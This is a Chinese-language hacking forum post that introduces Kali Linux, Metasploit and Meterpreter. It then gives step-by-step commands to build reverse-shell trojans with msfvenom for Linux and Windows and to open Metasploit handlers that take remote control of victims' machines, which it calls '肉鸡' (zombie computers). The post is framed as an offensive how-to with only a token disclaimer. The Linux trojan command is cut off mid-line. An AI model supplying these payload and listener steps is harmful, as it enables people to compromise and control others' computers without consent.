无名商城论坛

搜索
查看: 242|回复: 0

[其他技术] 【TYJ】Linux介绍Windows攻击

[复制链接]

1万

主题

1万

帖子

3万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
32464
发表于 2022-5-8 17:26:16 | 显示全部楼层 |阅读模式
声明:本篇内容,禁止用作非法目的,谢绝一切形式的转载。
  当你在无意间点击一个链接后,当你在不明情况安装一个程序时,当你忍不住点击一个美女图片的时候,你的设备可能就此沦陷了,成为了黑客眼中的"肉鸡"
kali Linux
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。

Metersploit
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

Meterpreter
Meterpreter是 Metasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击使用, 在触发漏洞后能够返回给我们一个控制通道。

Linux攻击
生成木马
网络上有好多生成木马的方式,但是大多数都是相互copy,甚至有的还可能包含病毒,谨慎使用。网络上下载的所有软件都要慎用,除非是在官网上下载的。

生成一个使用于Linux 64位系统的木马,生成木马的命令如下:

1 msfvenom -a x64 --platform linux  -p
LHOST 代表Listening host。LPORT代表Listening port。后续介绍网络的时候会详细讲解。

翻译一下这个命令:平台Linux x64架构,使用payload是linux/x64/meterpreter/reverse_tcp,目标文件的格式是elf。可执行目标文件的名称是test。通过上面的命令,我们就就可以生成一个elf格式的test程序,当在远端(也就是"肉鸡")执行这个程序的时候,如果本地开启了监听,肉鸡和本机之间就建立了一条通信的channel,通过这个木马就能实现控制远端的肉鸡了。[滑稽]

1.开启监听
开启msf

msfconsole
       2. 加载模块

msf5 >use exploit/multi/handler

       3. 设置payload

msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
      4.设置监听ip

msf5 exploit(multi/handler) > set lhost 192.168.42.49
        5.设置监听port

msf5 exploit(multi/handler) > set LPORT 5555
        6. 执行

msf5 exploit(multi/handler)>exploit
攻击效果
当执行玩exploit之后,我们可以获得一个Meterpreter。通过这个meterpreter,可以查看肉鸡中的文件,进程等。可以开启一个shell,这样基本等同于完全操控目标计算机了。通过查看whoami可知正是当前登陆用户的帐号。如何提升权限,后续会介绍。
Windows攻击
生成木马
msfvenom -a x64 --platform windows  -p windows/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=4444  -i 3 -f exe -o payload_test.exe
具体含义可参考上文。

开启监听
开启msf

msfconsole

       2. 加载模块

msf5 >use exploit/multi/handler

        3. 设置payload

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
        4.设置监听ip

msf5 exploit(multi/handler) > set lhost 192.168.42.49
        5.设置监听port

msf5 exploit(multi/handler) > set LPORT 4444
        6.执行

msf5 exploit(multi/handler) > exploit
后续更新在评论[爆笑]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表